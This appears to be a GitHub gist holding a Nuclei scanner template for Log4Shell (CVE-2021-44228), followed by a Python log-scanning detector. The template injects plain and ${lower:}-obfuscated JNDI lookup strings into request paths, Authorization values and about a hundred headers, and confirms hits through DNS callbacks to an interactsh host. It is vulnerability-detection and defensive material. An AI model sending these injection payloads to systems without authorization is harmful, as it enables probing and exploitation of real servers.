@hazcod
Last active December 18, 2023 06:50
Nuclei template to scan for log4shell (CVE-2021-44228).
```yaml
id: CVE-2021-44228

info:
  name: Log4J RCE
  author: iNvist / hazcod
  severity: critical
  description: CVE-2021-44228

requests:
  # Lookup placed in the request path; a DNS callback to interactsh confirms evaluation
  - raw:
      - |
        GET /{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

  # Same probe with a doubled leading slash
  - raw:
      - |
        GET //{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

  # Lookup obfuscated with nested ${lower:...} lookups
  - raw:
      - |
        GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

  - raw:
      - |
        GET //{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

  # TODO maybe encoding
  # Lookup placed in the query string
  - raw:
      - |
        GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

  # Lookup in the Authorization header, tried with several scheme prefixes
  - raw:
      - |
        GET /{{Path}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: {{auth_type}} ${jndi:dns://{{interactsh-url}}:80/o
    payloads:
      auth_type:
        - Bearer
        - Oauth
        - Token
        - Basic
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

  - raw:
      - |
        GET //{{Path}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: {{auth_type}} ${jndi:dns://{{interactsh-url}}:80/o
    payloads:
      auth_type:
        - Bearer
        - Oauth
        - Token
        - Basic
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

  # Obfuscated variant in the Authorization header; also matches a JRMP callback
  - raw:
      - |
        GET /{{Path}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: {{auth_type}} ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o
    payloads:
      auth_type:
        - Bearer
        - Oauth
        - Token
        - Basic
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
      - type: regex
        part: interactsh_request
        regex:
          - "JRMP"

  # Obfuscated lookup injected into each of a long list of request headers
  - raw:
      - |
        GET /{{Path}} HTTP/1.1
        Host: {{Hostname}}
        §header_val§: ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o
    payloads:
      header_val:
        - Accept
        - Accept-Charset
        - Accept-Datetime
        - Accept-Encoding
        - Accept-Language
        - Alt-Svc
        - Base-Url
        - CF-Connecting-IP
        - Cache-Control
        - Client-IP
        - Cluster
        - Cluster-Client-IP
        - Connection
        - Contact
        - Content-Length
        - Content-MD5
        - Content-Type
        - Cookie
        - DNT
        - Date
        - Destination
        - Expect
        - Forwarded
        - From
        - Front-End-Https
        - HTTP_CLIENT_IP
        - HTTP_FORWARDED
        - HTTP_FORWARDED_FOR
        - HTTP_X_FORWARDED
        - HTTP_X_FORWARDED_FOR
        - Host
        - Http-Url
        - If-Match
        - If-Modified-Since
        - If-None-Match
        - If-Range
        - If-Unmodified-Since
        - Link
        - Location
        - Max-Forwards
        - Origin
        - Pragma
        - Profile
        - Proxy
        - Proxy-Authorization
        - Proxy-Connection
        - Proxy-Host
        - Proxy-Url
        - Range
        - Real-IP
        - Redirect
        - Referer
        - Referrer
        - Refferer
        - Request-Uri
        - TE
        - True-Client-IP
        - UID
        - Upgrade
        - Uri
        - User-Agent
        - Via
        - Warning
        - X-ATT-DeviceId
        - X-Arbitrary
        - X-CSRFToken
        - X-Client-IP
        - X-Cluster-Client-IP
        - X-Correlation-ID
        - X-Csrf-Token
        - X-Do-Not-Track
        - X-Forward-For
        - X-Forwarded
        - X-Forwarded-By
        - X-Forwarded-For
        - X-Forwarded-For-IP
        - X-Forwarded-For-Original
        - X-Forwarded-Host
        - X-Forwarded-Proto
        - X-Forwarded-Server
        - X-Forwarder-For
        - X-Host
        - X-Http-Destinationurl
        - X-Http-Host-Override
        - X-Http-Method-Override
        - X-Original-Remote-Addr
        - X-Original-Url
        - X-Originating-IP
        - X-Proxy-Url
        - X-ProxyUser-IP
        - X-Real-IP
        - X-Remote-Addr
        - X-Remote-IP
        - X-Request-ID
        - X-Requested-With
        - X-Rewrite-Url
        - X-True-IP
        - X-UIDH
        - X-Wap-Profile
        - X-XSRF-TOKEN
    attack: clusterbomb
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

  # Plain lookup injected into the same list of request headers
  - raw:
      - |
        GET /{{Path}} HTTP/1.1
        Host: {{Hostname}}
        §header_val§: ${jndi:dns://{{interactsh-url}}:80/o
    payloads:
      header_val:
        - Accept
        - Accept-Charset
        - Accept-Datetime
        - Accept-Encoding
        - Accept-Language
        - Alt-Svc
        - Base-Url
        - CF-Connecting-IP
        - Cache-Control
        - Client-IP
        - Cluster
        - Cluster-Client-IP
        - Connection
        - Contact
        - Content-Length
        - Content-MD5
        - Content-Type
        - Cookie
        - DNT
        - Date
        - Destination
        - Expect
        - Forwarded
        - From
        - Front-End-Https
        - HTTP_CLIENT_IP
        - HTTP_FORWARDED
        - HTTP_FORWARDED_FOR
        - HTTP_X_FORWARDED
        - HTTP_X_FORWARDED_FOR
        - Host
        - Http-Url
        - If-Match
        - If-Modified-Since
        - If-None-Match
        - If-Range
        - If-Unmodified-Since
        - Link
        - Location
        - Max-Forwards
        - Origin
        - Pragma
        - Profile
        - Proxy
        - Proxy-Authorization
        - Proxy-Connection
        - Proxy-Host
        - Proxy-Url
        - Range
        - Real-IP
        - Redirect
        - Referer
        - Referrer
        - Refferer
        - Request-Uri
        - TE
        - True-Client-IP
        - UID
        - Upgrade
        - Uri
        - User-Agent
        - Via
        - Warning
        - X-ATT-DeviceId
        - X-Arbitrary
        - X-CSRFToken
        - X-Client-IP
        - X-Cluster-Client-IP
        - X-Correlation-ID
        - X-Csrf-Token
        - X-Do-Not-Track
        - X-Forward-For
        - X-Forwarded
        - X-Forwarded-By
        - X-Forwarded-For
        - X-Forwarded-For-IP
        - X-Forwarded-For-Original
        - X-Forwarded-Host
        - X-Forwarded-Proto
        - X-Forwarded-Server
        - X-Forwarder-For
        - X-Host
        - X-Http-Destinationurl
        - X-Http-Host-Override
        - X-Http-Method-Override
        - X-Original-Remote-Addr
        - X-Original-Url
        - X-Originating-IP
        - X-Proxy-Url
        - X-ProxyUser-IP
        - X-Real-IP
        - X-Remote-Addr
        - X-Remote-IP
        - X-Request-ID
        - X-Requested-With
        - X-Rewrite-Url
        - X-True-IP
        - X-UIDH
        - X-Wap-Profile
        - X-XSRF-TOKEN
    attack: clusterbomb
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
```
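The defender-side counterpart to the template above, added here and not part of the gist: it collapses the nested `${lower:...}` lookups the template uses (and the `${upper:...}` and `${x:-y}` default-value forms of the same trick) back to the string Log4j would evaluate, then flags JNDI probes in web access logs. The log lines are constructed samples and `oast.example.invalid` is a placeholder callback host.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not from the gist). The probe strings mirror
# the forms the template sends: plain in the path, ${lower:...}-obfuscated with a
# doubled slash, and in a request header. oast.example.invalid is a placeholder.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /${jndi:dns://oast.example.invalid:80/d HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.5 - - [10/Dec/2021:12:00:02 +0000] "GET //${${lower:jn}di:${lower:dn}s://oast.example.invalid:80/d HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.6 - - [10/Dec/2021:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${upper:j}ndi:ldap://oast.example.invalid/o}"',
]

# Innermost Log4j lookups that evasion variants build on: ${lower:x}, ${upper:x}
# and the default-value form ${anything:-x}. All three evaluate to plain text.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r'jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://[^\s"}]*', re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested case/default lookups inside-out, as Log4j would, to expose the probe."""
    for _ in range(max_rounds):
        resolved = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def find_log4shell_probe(line: str) -> Optional[Dict[str, object]]:
    """Return the JNDI indicator found in one log line after normalization, or None."""
    normalized = normalize_lookups(line)
    match = _JNDI.search(normalized)
    if not match:
        return None
    return {"scheme": match.group(1).lower(), "indicator": match.group(0),
            "obfuscated": normalized != line}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Report each probe with its zero-based line index; empty list when clean."""
    hits = []
    for idx, line in enumerate(lines):
        hit = find_log4shell_probe(line)
        if hit:
            hits.append({"line": idx, **hit})
    return hits
```

Run `scan_log` over real access or application logs to find which request fields (path, headers, User-Agent) reached a Log4j-backed logger; the `obfuscated` flag separates the plain probes from the lookup-wrapped ones.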